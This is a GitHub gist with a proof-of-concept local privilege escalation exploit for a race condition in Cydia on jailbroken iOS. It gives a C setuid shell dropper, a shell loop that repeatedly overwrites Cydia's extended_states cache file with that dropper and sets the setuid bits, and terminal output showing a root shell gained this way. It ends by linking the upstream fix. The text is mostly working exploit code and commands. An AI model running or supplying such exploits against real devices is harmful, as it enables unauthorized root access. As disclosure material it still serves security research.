Skip to content

Instantly share code, notes, and snippets.

@PythEch

PythEch/poc.md

Last active July 11, 2022 00:46
Show Gist options
  • Save PythEch/98540c9be6870d4ad8c6 to your computer and use it in GitHub Desktop.
Save PythEch/98540c9be6870d4ad8c6 to your computer and use it in GitHub Desktop.
Download ZIP
MobileCydia.mm Race Condition LPE
Raw
poc.md

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}

Execute following commands:

cd /var/mobile/Library/Caches/com.saurik.Cydia/
rm extended_states # in case it exists
while true; do cp drop_shell extended_states; chmod 6771 extended_states; done

Finally launch Cydia.app and install/remove something. After that check /var/lib/apt/ since this is a race condition it might not work everytime.

Hakans-iPhone:/var/lib/apt mobile$ ls -al
total 52
drwxr-xr-x 4 root wheel   170 Sep 23 20:12 ./
drwxr-xr-x 6 root admin   204 Jul 13 05:00 ../
-rwsrws--x 1 root wheel 50112 Sep 23 20:12 extended_states*
drwxr-xr-x 3 root wheel   102 Aug  8 17:05 lists/
drwxr-xr-x 2 root wheel    68 Jun 13  2014 periodic/
Hakans-iPhone:/var/lib/apt mobile$ ./extended_states
Hakans-iPhone:/var/lib/apt root# id
uid=0(root) gid=501(mobile) groups=0(wheel),501(mobile)
Hakans-iPhone:/var/lib/apt root# whoami
root

Fixed in http://gitweb.saurik.com/cydia.git/commit/ab1ec63ebd2a216213d9fb98c6ceac2dd4564810

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment